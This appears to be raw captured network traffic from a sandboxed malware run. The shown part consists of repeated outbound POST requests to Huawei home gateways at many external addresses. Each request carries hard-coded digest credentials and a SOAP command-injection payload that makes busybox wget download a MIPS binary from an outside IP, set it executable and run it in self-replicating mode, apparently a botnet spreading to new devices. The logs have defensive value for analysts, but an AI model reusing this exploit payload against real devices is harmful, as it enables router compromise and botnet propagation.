                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2192.168.2.233346241.107.86.18937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220833063 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192.168.2.2345112157.87.181.13437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220865965 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192.168.2.234028223.141.91.22837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220905066 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192.168.2.2340788157.147.238.18637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220899105 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192.168.2.234873441.174.115.24437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220899105 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192.168.2.235422237.80.86.16537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220937014 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192.168.2.2342510173.155.49.1737215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220937014 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192.168.2.2353130157.110.226.14337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220948935 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192.168.2.2334064221.200.167.16437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220953941 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192.168.2.2355530157.37.107.13437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220983028 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
